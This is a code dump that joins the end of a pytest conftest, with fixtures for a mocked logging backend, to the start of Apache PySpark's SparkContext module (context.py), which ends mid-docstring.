collect_responses,
):
def stop_backend_func(threads=None):
threads = threads or ()
done = False
_internal_sender.publish_exit(0)
for _ in range(30):
poll_exit_resp = _internal_sender.communicate_poll_exit()
if poll_exit_resp:
done = poll_exit_resp.done
if done:
collect_responses.local_info = poll_exit_resp.local_info
break
time.sleep(1)
_internal_sender.join()
for t in threads:
t.join()
assert done, "backend didnt shutdown"
yield stop_backend_func
@pytest.fixture()
def backend_interface(_start_backend, _stop_backend, _internal_sender):
@contextmanager
def backend_context(initial_run=True, initial_start=False):
threads = _start_backend(initial_run=initial_run, initial_start=initial_start)
try:
yield _internal_sender
finally:
_stop_backend(threads=threads)
return backend_context
@pytest.fixture
def publish_util(
mocked_run, mock_server, backend_interface, parse_ctx,
):
def fn(
metrics=None,
history=None,
artifacts=None,
files=None,
begin_cb=None,
end_cb=None,
initial_start=False,
):
metrics = metrics or []
history = history or []
artifacts = artifacts or []
files = files or []
with backend_interface(initial_start=initial_start) as interface:
if begin_cb:
begin_cb(interface)
for m in metrics:
interface._publish_metric(m)
for h in history:
interface.publish_history(**h)
for a in artifacts:
interface.publish_artifact(**a)
for f in files:
interface.publish_files(**f)
if end_cb:
end_cb(interface)
ctx_util = parse_ctx(mock_server.ctx, run_id=mocked_run.id)
return ctx_util
yield fn
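# Illustrative sketch (a real test would live in a test module, not in
# conftest.py): push one history row through the fake backend via publish_util
# and inspect the parsed mock-server context; the data/step keywords are
# assumed to match interface.publish_history(**h).
def test_publish_util_example(publish_util):
    ctx_util = publish_util(history=[dict(data={"loss": 0.1}, step=0)])
    assert ctx_util is not None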
@pytest.fixture
def tbwatcher_util(mocked_run, mock_server, internal_hm, backend_interface, parse_ctx):
def fn(write_function, logdir="./", save=True, root_dir="./"):
with backend_interface() as interface:
proto_run = pb.RunRecord()
mocked_run._make_proto_run(proto_run)
run_start = pb.RunStartRequest()
run_start.run.CopyFrom(proto_run)
request = pb.Request()
request.run_start.CopyFrom(run_start)
record = pb.Record()
record.request.CopyFrom(request)
internal_hm.handle_request_run_start(record)
internal_hm._tb_watcher.add(logdir, save, root_dir)
# need to sleep to give time for the tb_watcher delay
time.sleep(15)
write_function()
ctx_util = parse_ctx(mock_server.ctx)
return ctx_util
yield fn
@pytest.fixture
def inject_requests(mock_server):
"""Fixture for injecting responses and errors to mock_server."""
# TODO(jhr): make this compatible with live_mock_server
return utils.InjectRequests(ctx=mock_server.ctx)
class Responses:
pass
@pytest.fixture
def collect_responses():
responses = Responses()
yield responses
@pytest.fixture
def mock_tty(monkeypatch):
class WriteThread(threading.Thread):
def __init__(self, fname):
threading.Thread.__init__(self)
self._fname = fname
self._q = queue.Queue()
def run(self):
with open(self._fname, "w") as fp:
while True:
data = self._q.get()
if data == "_DONE_":
break
fp.write(data)
fp.flush()
def add(self, input_str):
self._q.put(input_str)
def stop(self):
self.add("_DONE_")
with tempfile.TemporaryDirectory() as tmpdir:
fds = dict()
def setup_fn(input_str):
fname = os.path.join(tmpdir, "file.txt")
if platform.system() != "Windows":
os.mkfifo(fname, 0o600)
writer = WriteThread(fname)
writer.start()
writer.add(input_str)
fds["writer"] = writer
monkeypatch.setattr("termios.tcflush", lambda x, y: None)
else:
# windows doesn't support named pipes, just write it
# TODO: emulate msvcrt to support input on windows
with open(fname, "w") as fp:
fp.write(input_str)
fds["stdin"] = open(fname, "r")
monkeypatch.setattr("sys.stdin", fds["stdin"])
sys.stdin.isatty = lambda: True
sys.stdout.isatty = lambda: True
yield setup_fn
writer = fds.get("writer")
if writer:
writer.stop()
writer.join()
stdin = fds.get("stdin")
if stdin:
stdin.close()
del sys.stdin.isatty
del sys.stdout.isatty
|
context.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import os
import shutil
import signal
import sys
import threading
import warnings
from threading import RLock
from tempfile import NamedTemporaryFile
from py4j.protocol import Py4JError
from pyspark import accumulators
from pyspark.accumulators import Accumulator
from pyspark.broadcast import Broadcast, BroadcastPickleRegistry
from pyspark.conf import SparkConf
from pyspark.files import SparkFiles
from pyspark.java_gateway import launch_gateway
from pyspark.serializers import PickleSerializer, BatchedSerializer, UTF8Deserializer, \
PairDeserializer, AutoBatchedSerializer, NoOpSerializer
from pyspark.storagelevel import StorageLevel
from pyspark.rdd import RDD, _load_from_socket, ignore_unicode_prefix
from pyspark.traceback_utils import CallSite, first_spark_call
from pyspark.status import StatusTracker
from pyspark.profiler import ProfilerCollector, BasicProfiler
if sys.version > '3':
xrange = range
__all__ = ['SparkContext']
# These are special default configs for PySpark, they will overwrite
# the default ones for Spark if they are not configured by user.
DEFAULT_CONFIGS = {
"spark.serializer.objectStreamReset": 100,
"spark.rdd.compress": True,
}
class SparkContext(object):
"""
Main entry point for Spark functionality. A SparkContext represents the
connection to a Spark cluster, and can be used to create L{RDD} and
broadcast variables on that cluster.
"""
_gateway = None
_jvm = None
_next_accum_id = 0
_active_spark_context = None
_lock = RLock()
_python_includes = None # zip and egg files that need to be added to PYTHONPATH
PACKAGE_EXTENSIONS = ('.zip', '.egg', '.jar')
def __init__(self, master=None, appName=None, sparkHome=None, pyFiles=None,
environment=None, batchSize=0, serializer=PickleSerializer(), conf=None,
gateway=None, jsc=None, profiler_cls=BasicProfiler):
"""
Create a new SparkContext. At least the master and app name should be set,
either through the named parameters here or through C{conf}.
:param master: Cluster URL to connect to
(e.g. mesos://host:port, spark://host:port, local[4]).
:param appName: A name for your job, to display on the cluster web UI.
:param sparkHome: Location where Spark is installed on cluster nodes.
:param pyFiles: Collection of .zip or .py files to send to the cluster
and add to PYTHONPATH. These can be paths on the local file
system or HDFS, HTTP, HTTPS, or FTP URLs.
:param environment: A dictionary of environment variables to set on
worker nodes.
:param batchSize: The number of Python objects represented as a single
Java object. Set 1 to disable batching, 0 to automatically choose
the batch size based on object sizes, or -1 to use an unlimited
batch size
:param serializer: The serializer for RDDs.
:param conf: A L{SparkConf} object setting Spark properties.
:param gateway: Use an existing gateway and JVM, otherwise a new JVM
will be instantiated.
:param jsc: The JavaSparkContext instance (optional).
:param profiler_cls: A class of custom Profiler used to do profiling
(default is pyspark.profiler.BasicProfiler).
>>> from pyspark.context import SparkContext
>>> sc = SparkContext('local', 'test')
>>> sc2 = SparkContext('local', 'test2') # doctest: +IGNORE_EXCEPTION_DETAIL
Traceback (most recent call last):
...
ValueError:...
"""
self._callsite = first_spark_call() or CallSite(None, None, None)
SparkContext._ensure_initialized(self, gateway=gateway, conf=conf)
try:
self._do_init(master, appName, sparkHome, pyFiles, environment, batchSize, serializer,
conf, jsc, profiler_cls)
except:
# If an error occurs, clean up in order to allow future SparkContext creation:
self.stop()
raise
def _do_init(self, master, appName, sparkHome, pyFiles, environment, batchSize, serializer,
conf, jsc, profiler_cls):
self.environment = environment or {}
# java gateway must have been launched at this point.
if conf is not None and conf._jconf is not None:
# conf has been initialized in JVM properly, so use conf directly. This represent the
# scenario that JVM has been launched before SparkConf is created (e.g. SparkContext is
# created and then stopped, and we create a new SparkConf and new SparkContext again)
self._conf = conf
else:
self._conf = SparkConf(_jvm=SparkContext._jvm)
if conf is not None:
for k, v in conf.getAll():
self._conf.set(k, v)
self._batchSize = batchSize # -1 represents an unlimited batch size
self._unbatched_serializer = serializer
if batchSize == 0:
self.serializer = AutoBatchedSerializer(self._unbatched_serializer)
else:
self.serializer = BatchedSerializer(self._unbatched_serializer,
batchSize)
# Set any parameters passed directly to us on the conf
if master:
self._conf.setMaster(master)
if appName:
self._conf.setAppName(appName)
if sparkHome:
self._conf.setSparkHome(sparkHome)
if environment:
for key, value in environment.items():
self._conf.setExecutorEnv(key, value)
for key, value in DEFAULT_CONFIGS.items():
self._conf.setIfMissing(key, value)
# Check that we have at least the required parameters
if not self._conf.contains("spark.master"):
raise Exception("A master URL must be set in your configuration")
if not self._conf.contains("spark.app.name"):
raise Exception("An application name must be set in your configuration")
# Read back our properties from the conf in case we loaded some of them from
# the classpath or an external config file
self.master = self._conf.get("spark.master")
self.appName = self._conf.get("spark.app.name")
self.sparkHome = self._conf.get("spark.home", None)
for (k, v) in self._conf.getAll():
if k.startswith("spark.executorEnv."):
varName = k[len("spark.executorEnv."):]
self.environment[varName] = v
self.environment["PYTHONHASHSEED"] = os.environ.get("PYTHONHASHSEED", "0")
# Create the Java SparkContext through Py4J
self._jsc = jsc or self._initialize_context(self._conf._jconf)
# Reset the SparkConf to the one actually used by the SparkContext in JVM.
self._conf = SparkConf(_jconf=self._jsc.sc().conf())
# Create a single Accumulator in Java that we'll send all our updates through;
# they will be passed back to us through a TCP server
self._accumulatorServer = accumulators._start_update_server()
(host, port) = self._accumulatorServer.server_address
self._javaAccumulator = self._jvm.PythonAccumulatorV2(host, port)
self._jsc.sc().register(self._javaAccumulator)
self.pythonExec = os.environ.get("PYSPARK_PYTHON", 'python')
self.pythonVer = "%d.%d" % sys.version_info[:2]
# Broadcast's __reduce__ method stores Broadcast instances here.
# This allows other code to determine which Broadcast instances have
# been pickled, so it can determine which Java broadcast objects to
# send.
self._pickled_broadcast_vars = BroadcastPickleRegistry()
SparkFiles._sc = self
root_dir = SparkFiles.getRootDirectory()
sys.path.insert(1, root_dir)
# Deploy any code dependencies specified in the constructor
self._python_includes = list()
for path in (pyFiles or []):
self.addPyFile(path)
# Deploy code dependencies set by spark-submit; these will already have been added
# with SparkContext.addFile, so we just need to add them to the PYTHONPATH
for path in self._conf.get("spark.submit.pyFiles", "").split(","):
if path != "":
(dirname, filename) = os.path.split(path)
if filename[-4:].lower() in self.PACKAGE_EXTENSIONS:
self._python_includes.append(filename)
sys.path.insert(1, os.path.join(SparkFiles.getRootDirectory(), filename))
# Create a temporary directory inside spark.local.dir:
local_dir = self._jvm.org.apache.spark.util.Utils.getLocalDir(self._jsc.sc().conf())
self._temp_dir = \
self._jvm.org.apache.spark.util.Utils.createTempDir(local_dir, "pyspark") \
.getAbsolutePath()
# profiling stats collected for each PythonRDD
if self._conf.get("spark.python.profile", "false") == "true":
dump_path = self._conf.get("spark.python.profile.dump", None)
self.profiler_collector = ProfilerCollector(profiler_cls, dump_path)
else:
self.profiler_collector = None
# create a signal handler which would be invoked on receiving SIGINT
def signal_handler(signal, frame):
self.cancelAllJobs()
raise KeyboardInterrupt()
# see http://stackoverflow.com/questions/23206787/
if isinstance(threading.current_thread(), threading._MainThread):
signal.signal(signal.SIGINT, signal_handler)
def __repr__(self):
return "<SparkContext master={master} appName={appName}>".format(
master=self.master,
appName=self.appName,
)
def _repr_html_(self):
return """
<div>
<p><b>SparkContext</b></p>
<p><a href="{sc.uiWebUrl}">Spark UI</a></p>
<dl>
<dt>Version</dt>
<dd><code>v{sc.version}</code></dd>
<dt>Master</dt>
<dd><code>{sc.master}</code></dd>
<dt>AppName</dt>
<dd><code>{sc.appName}</code></dd>
</dl>
</div>
""".format(
sc=self
)
def _initialize_context(self, jconf):
"""
Initialize SparkContext in function to allow subclass specific initialization
"""
return self._jvm.JavaSparkContext(jconf)
@classmethod
def _ensure_initialized(cls, instance=None, gateway=None, conf=None):
"""
Checks whether a SparkContext is initialized or not.
Throws error if a SparkContext is already running.
"""
with SparkContext._lock:
if not SparkContext._gateway:
SparkContext._gateway = gateway or launch_gateway(conf)
SparkContext._jvm = SparkContext._gateway.jvm
if instance:
if (SparkContext._active_spark_context and
SparkContext._active_spark_context != instance):
currentMaster = SparkContext._active_spark_context.master
currentAppName = SparkContext._active_spark_context.appName
callsite = SparkContext._active_spark_context._callsite
# Raise error if there is already a running Spark context
raise ValueError(
"Cannot run multiple SparkContexts at once; "
"existing SparkContext(app=%s, master=%s)"
" created by %s at %s:%s "
% (currentAppName, currentMaster,
callsite.function, callsite.file, callsite.linenum))
else:
SparkContext._active_spark_context = instance
def __getnewargs__(self):
# This method is called when attempting to pickle SparkContext, which is always an error:
raise Exception(
"It appears that you are attempting to reference SparkContext from a broadcast "
"variable, action, or transformation. SparkContext can only be used on the driver, "
"not in code that it run on workers. For more information, see SPARK-5063."
)
def __enter__(self):
"""
Enable 'with SparkContext(...) as sc: app(sc)' syntax.
"""
return self
def __exit__(self, type, value, trace):
"""
Enable 'with SparkContext(...) as sc: app' syntax.
Specifically stop the context on exit of the with block.
"""
self.stop()
@classmethod
def getOrCreate(cls, conf=None):
"""
Get or instantiate a SparkContext and register it as a singleton object.
:param conf: SparkConf (optional)
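        A minimal usage sketch (illustrative only, not executed as a doctest):
        >>> sc1 = SparkContext.getOrCreate()  # doctest: +SKIP
        >>> sc2 = SparkContext.getOrCreate()  # doctest: +SKIP
        >>> sc1 is sc2  # doctest: +SKIP
        True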
"""
with SparkContext._lock:
if SparkContext._active_spark_context is None:
SparkContext(conf=conf or SparkConf())
return SparkContext._active_spark_context
def setLogLevel(self, logLevel):
"""
Control our logLevel. This overrides any user-defined log settings.
Valid log levels include: ALL, DEBUG, ERROR, FATAL, INFO, OFF, TRACE, WARN
"""
self._jsc.setLogLevel(logLevel)
@classmethod
def setSystemProperty(cls, key, value):
"""
        Set a Java system property, such as spark.executor.memory. This must
        be invoked before instantiating SparkContext.
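        For example (illustrative only, not executed as a doctest):
        >>> SparkContext.setSystemProperty("spark.executor.memory", "2g")  # doctest: +SKIP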
"""
SparkContext._ensure_initialized()
SparkContext._jvm.java.lang.System.setProperty(key, value)
@property
def version(self):
"""
The version of Spark on which this application is running.
"""
return self._jsc.version()
@property
@ignore_unicode_prefix
def applicationId(self):
"""
A unique identifier for the Spark application.
Its format depends on the scheduler implementation.
* in case of local spark app something like 'local-1433865536131'
* in case of YARN something like 'application_1433865536131_34483'
>>> sc.applicationId # doctest: +ELLIPSIS
u'local-...'
"""
return self._jsc.sc().applicationId()
@property
def uiWebUrl(self):
"""Return the URL of the SparkUI instance started by this SparkContext"""
return self._jsc.sc().uiWebUrl().get()
@property
def startTime(self):
"""Return the epoch time when the Spark Context was started."""
return self._jsc.startTime()
@property
def defaultParallelism(self):
"""
Default level of parallelism to use when not given by user (e.g. for
reduce tasks)
"""
return self._jsc.sc().defaultParallelism()
@property
def defaultMinPartitions(self):
"""
Default min number of partitions for Hadoop RDDs when not given by user
"""
return self._jsc.sc().defaultMinPartitions()
def stop(self):
"""
Shut down the SparkContext.
"""
if getattr(self, "_jsc", None):
try:
self._jsc.stop()
except Py4JError:
# Case: SPARK-18523
warnings.warn(
'Unable to cleanly shutdown Spark JVM process.'
' It is possible that the process has crashed,'
' been killed or may also be in a zombie state.',
RuntimeWarning
)
pass
finally:
self._jsc = None
if getattr(self, "_accumulatorServer", None):
self._accumulatorServer.shutdown()
self._accumulatorServer = None
with SparkContext._lock:
SparkContext._active_spark_context = None
def emptyRDD(self):
"""
Create an RDD that has no partitions or elements.
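        A small illustrative example (not executed as a doctest):
        >>> sc.emptyRDD().collect()  # doctest: +SKIP
        []
        >>> sc.emptyRDD().getNumPartitions()  # doctest: +SKIP
        0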
"""
return RDD(self._jsc.emptyRDD(), self, NoOpSerializer())
def range(self, start, end=None, step=1, numSlices=None):
"""
Create a new RDD of int containing elements from `start` to `end`
(exclusive), increased by `step` every element. Can be called the same
way as python's built-in range() function. If called with a single argument,
the argument is interpreted as `end`, and `start` is set to 0.
:param start: the start value
:param end: the end value (exclusive)
:param step: the incremental step (default: 1)
:param numSlices: the number of partitions of the new RDD
:return: An RDD of int
>>> sc.range(5).collect()
[0, 1, 2, 3, 4]
>>> sc.range(2, 4).collect()
[2, 3]
>>> sc.range(1, 7, 2).collect()
[1, 3, 5]
"""
if end is None:
end = start
start = 0
return self.parallelize(xrange(start, end, step), numSlices)
def parallelize(self, c, numSlices=None):
"""
Distribute a local Python collection to form an RDD. Using xrange
is recommended if the input represents a range for performance.
>>> sc.parallelize([0, 2, 3, 4, 6], 5).glom().collect()
[[0], [2], [3], [4], [6]]
>>> sc.parallelize(xrange(0, 6, 2), 5).glom().collect()
[[], [0], [], [2], [4]]
"""
numSlices = int(numSlices) if numSlices is not None else self.defaultParallelism
if isinstance(c, xrange):
size = len(c)
if size == 0:
return self.parallelize([], numSlices)
step = c[1] - c[0] if size > 1 else 1
start0 = c[0]
def getStart(split):
return start0 + int((split * size / numSlices)) * step
def f(split, iterator):
return xrange(getStart(split), getStart(split + 1), step)
return self.parallelize([], numSlices).mapPartitionsWithIndex(f)
# Make sure we distribute data evenly if it's smaller than self.batchSize
if "__len__" not in dir(c):
c = list(c) # Make it a list so we can compute its length
batchSize = max(1, min(len(c) // numSlices, self._batchSize or 1024))
serializer = BatchedSerializer(self._unbatched_serializer, batchSize)
jrdd = self._serialize_to_jvm(c, numSlices, serializer)
return RDD(jrdd, self, serializer)
def _serialize_to_jvm(self, data, parallelism, serializer):
"""
Calling the Java parallelize() method with an ArrayList is too slow,
because it sends O(n) Py4J commands. As an alternative, serialized
objects are written to a file and loaded through textFile().
"""
tempFile = NamedTemporaryFile(delete=False, dir=self._temp_dir)
try:
serializer.dump_stream(data, tempFile)
tempFile.close()
readRDDFromFile = self._jvm.PythonRDD.readRDDFromFile
return readRDDFromFile(self._jsc, tempFile.name, parallelism)
finally:
            # readRDDFromFile eagerly reads the file, so we can delete it right after.
os.unlink(tempFile.name)
def pickleFile(self, name, minPartitions=None):
"""
Load an RDD previously saved using L{RDD.saveAsPickleFile} method.
>>> tmpFile = NamedTemporaryFile(delete=True)
>>> tmpFile.close()
>>> sc.parallelize(range(10)).saveAsPickleFile(tmpFile.name, 5)
>>> sorted(sc.pickleFile(tmpFile.name, 3).collect())
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.objectFile(name, minPartitions), self)
@ignore_unicode_prefix
def textFile(self, name, minPartitions=None, use_unicode=True):
"""
Read a text file from HDFS, a local file system (available on all
nodes), or any Hadoop-supported file system URI, and return it as an
RDD of Strings.
If use_unicode is False, the strings will be kept as `str` (encoding
as `utf-8`), which is faster and smaller than unicode. (Added in
Spark 1.2)
>>> path = os.path.join(tempdir, "sample-text.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("Hello world!")
>>> textFile = sc.textFile(path)
>>> textFile.collect()
[u'Hello world!']
"""
minPartitions = minPartitions or min(self.defaultParallelism, 2)
return RDD(self._jsc.textFile(name, minPartitions), self,
UTF8Deserializer(use_unicode))
@ignore_unicode_prefix
def wholeTextFiles(self, path, minPartitions=None, use_unicode=True):
"""
Read a directory of text files from HDFS, a local file system
(available on all nodes), or any Hadoop-supported file system
URI. Each file is read as a single record and returned in a
key-value pair, where the key is the path of each file, the
value is the content of each file.
If use_unicode is False, the strings will be kept as `str` (encoding
as `utf-8`), which is faster and smaller than unicode. (Added in
Spark 1.2)
For example, if you have the following files::
hdfs://a-hdfs-path/part-00000
hdfs://a-hdfs-path/part-00001
...
hdfs://a-hdfs-path/part-nnnnn
Do C{rdd = sparkContext.wholeTextFiles("hdfs://a-hdfs-path")},
then C{rdd} contains::
(a-hdfs-path/part-00000, its content)
(a-hdfs-path/part-00001, its content)
...
(a-hdfs-path/part-nnnnn, its content)
.. note:: Small files are preferred, as each file will be loaded
fully in memory.
>>> dirPath = os.path.join(tempdir, "files")
>>> os.mkdir(dirPath)
>>> with open(os.path.join(dirPath, "1.txt"), "w") as file1:
... _ = file1.write("1")
>>> with open(os.path.join(dirPath, "2.txt"), "w") as file2:
... _ = file2.write("2")
>>> textFiles = sc.wholeTextFiles(dirPath)
>>> sorted(textFiles.collect())
[(u'.../1.txt', u'1'), (u'.../2.txt', u'2')]
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.wholeTextFiles(path, minPartitions), self,
PairDeserializer(UTF8Deserializer(use_unicode), UTF8Deserializer(use_unicode)))
def binaryFiles(self, path, minPartitions=None):
"""
.. note:: Experimental
Read a directory of binary files from HDFS, a local file system
(available on all nodes), or any Hadoop-supported file system URI
as a byte array. Each file is read as a single record and returned
in a key-value pair, where the key is the path of each file, the
value is the content of each file.
        .. note:: Small files are preferred; large files are also allowed, but
            may cause poor performance.
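        An illustrative sketch (the directory path is an assumption; not
        executed as a doctest):
        >>> sizes = sc.binaryFiles("/path/to/binary-dir").mapValues(len)  # doctest: +SKIP
        >>> sizes.collect()  # doctest: +SKIP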
"""
minPartitions = minPartitions or self.defaultMinPartitions
return RDD(self._jsc.binaryFiles(path, minPartitions), self,
PairDeserializer(UTF8Deserializer(), NoOpSerializer()))
def binaryRecords(self, path, recordLength):
"""
.. note:: Experimental
Load data from a flat binary file, assuming each record is a set of numbers
with the specified numerical format (see ByteBuffer), and the number of
bytes per record is constant.
:param path: Directory to the input data files
:param recordLength: The length at which to split the records
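        An illustrative sketch (the path and the 8-byte record layout are
        assumptions; not executed as a doctest):
        >>> import struct
        >>> recs = sc.binaryRecords("/path/to/fixed-len-records", 8)  # doctest: +SKIP
        >>> recs.map(lambda r: struct.unpack("<q", r)[0]).take(3)  # doctest: +SKIP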
"""
return RDD(self._jsc.binaryRecords(path, recordLength), self, NoOpSerializer())
def _dictToJavaMap(self, d):
jm = self._jvm.java.util.HashMap()
if not d:
d = {}
for k, v in d.items():
jm[k] = v
return jm
def sequenceFile(self, path, keyClass=None, valueClass=None, keyConverter=None,
valueConverter=None, minSplits=None, batchSize=0):
"""
Read a Hadoop SequenceFile with arbitrary key and value Writable class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is as follows:
1. A Java RDD is created from the SequenceFile or other InputFormat, and the key
and value Writable classes
2. Serialization is attempted via Pyrolite pickling
3. If this fails, the fallback is to call 'toString' on each key and value
4. C{PickleSerializer} is used to deserialize pickled objects on the Python side
        :param path: path to sequence file
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
        :param keyConverter: (None by default)
        :param valueConverter: (None by default)
:param minSplits: minimum splits in dataset
(default min(2, sc.defaultParallelism))
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
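        A minimal call sketch (illustrative; the path and Writable classes are
        assumptions; not executed as a doctest):
        >>> rdd = sc.sequenceFile("hdfs:///data/seq", "org.apache.hadoop.io.Text", "org.apache.hadoop.io.LongWritable")  # doctest: +SKIP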
"""
minSplits = minSplits or min(self.defaultParallelism, 2)
jrdd = self._jvm.PythonRDD.sequenceFile(self._jsc, path, keyClass, valueClass,
keyConverter, valueConverter, minSplits, batchSize)
return RDD(jrdd, self)
def newAPIHadoopFile(self, path, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read a 'new API' Hadoop InputFormat with arbitrary key and value class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is the same as for sc.sequenceFile.
A Hadoop configuration can be passed in as a Python dict. This will be converted into a
Configuration in Java
:param path: path to Hadoop file
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.input.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.newAPIHadoopFile(self._jsc, path, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def newAPIHadoopRDD(self, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read a 'new API' Hadoop InputFormat with arbitrary key and value class, from an arbitrary
Hadoop configuration, which is passed in as a Python dict.
This will be converted into a Configuration in Java.
The mechanism is the same as for sc.sequenceFile.
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapreduce.lib.input.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.newAPIHadoopRDD(self._jsc, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def hadoopFile(self, path, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read an 'old' Hadoop InputFormat with arbitrary key and value class from HDFS,
a local file system (available on all nodes), or any Hadoop-supported file system URI.
The mechanism is the same as for sc.sequenceFile.
A Hadoop configuration can be passed in as a Python dict. This will be converted into a
Configuration in Java.
:param path: path to Hadoop file
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapred.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.hadoopFile(self._jsc, path, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def hadoopRDD(self, inputFormatClass, keyClass, valueClass, keyConverter=None,
valueConverter=None, conf=None, batchSize=0):
"""
Read an 'old' Hadoop InputFormat with arbitrary key and value class, from an arbitrary
Hadoop configuration, which is passed in as a Python dict.
This will be converted into a Configuration in Java.
The mechanism is the same as for sc.sequenceFile.
:param inputFormatClass: fully qualified classname of Hadoop InputFormat
(e.g. "org.apache.hadoop.mapred.TextInputFormat")
:param keyClass: fully qualified classname of key Writable class
(e.g. "org.apache.hadoop.io.Text")
:param valueClass: fully qualified classname of value Writable class
(e.g. "org.apache.hadoop.io.LongWritable")
:param keyConverter: (None by default)
:param valueConverter: (None by default)
:param conf: Hadoop configuration, passed in as a dict
(None by default)
:param batchSize: The number of Python objects represented as a single
Java object. (default 0, choose batchSize automatically)
"""
jconf = self._dictToJavaMap(conf)
jrdd = self._jvm.PythonRDD.hadoopRDD(self._jsc, inputFormatClass, keyClass,
valueClass, keyConverter, valueConverter,
jconf, batchSize)
return RDD(jrdd, self)
def _checkpointFile(self, name, input_deserializer):
jrdd = self._jsc.checkpointFile(name)
return RDD(jrdd, self, input_deserializer)
@ignore_unicode_prefix
def union(self, rdds):
"""
Build the union of a list of RDDs.
This supports unions() of RDDs with different serialized formats,
although this forces them to be reserialized using the default
serializer:
>>> path = os.path.join(tempdir, "union-text.txt")
>>> with open(path, "w") as testFile:
... _ = testFile.write("Hello")
>>> textFile = sc.textFile(path)
>>> textFile.collect()
[u'Hello']
>>> parallelized = sc.parallelize(["World!"])
>>> sorted(sc.union([textFile, parallelized]).collect())
[u'Hello', 'World!']
"""
first_jrdd_deserializer = rdds[0]._jrdd_deserializer
if any(x._jrdd_deserializer != first_jrdd_deserializer for x in rdds):
rdds = [x._reserialize() for x in rdds]
first = rdds[0]._jrdd
rest = [x._jrdd for x in rdds[1:]]
return RDD(self._jsc.union(first, rest), self, rdds[0]._jrdd_deserializer)
def broadcast(self, value):
"""
Broadcast a read-only variable to the cluster, returning a
L{Broadcast<pyspark.broadcast.Broadcast>}
object for reading it in distributed functions. The variable will
be sent to each cluster only once.
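        A minimal sketch of typical usage (illustrative; not executed as a doctest):
        >>> b = sc.broadcast([1, 2, 3])  # doctest: +SKIP
        >>> b.value  # doctest: +SKIP
        [1, 2, 3]
        >>> sc.parallelize([0, 0]).flatMap(lambda x: b.value).collect()  # doctest: +SKIP
        [1, 2, 3, 1, 2, 3]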
"""
return Broadcast(self, value, self._pickled_broadcast_vars)
def accumulator(self, value, accum_param=None):
"""
Create an L{Accumulator} with the given initial value, using a given
L{AccumulatorParam} helper object to define how to add values of the
data type if provided. Default AccumulatorParams are used for integers
and floating-point numbers if you do not provide one. For other types,
a custom AccumulatorParam can be used.
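        A minimal sketch of typical usage (illustrative; not executed as a doctest):
        >>> a = sc.accumulator(0)  # doctest: +SKIP
        >>> sc.parallelize(range(5)).foreach(lambda x: a.add(x))  # doctest: +SKIP
        >>> a.value  # doctest: +SKIP
        10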
"""
if accum_param is None:
if isinstance(value, int):
accum_param = accumulators.INT_ACCUMULATOR_PARAM
elif isinstance(value, float):
accum_param = accumulators.FLOAT_ACCUMULATOR_PARAM
elif isinstance(value, complex):
accum_param = accumulators.COMPLEX_ACCUMULATOR_PARAM
else:
raise TypeError("No default accumulator param for type %s" % type(value))
SparkContext._next_accum_id += 1
return Accumulator(SparkContext._next_accum_id - 1, value, accum_param)
def addFile(self, path, recursive=False):
"""
Add a file to be downloaded with this Spark job on every node.
The C{path} passed can be either a local file, a file in HDFS
(or other Hadoop-supported filesystems), or an HTTP, HTTPS or
FTP URI.
To access the file in Spark jobs, use
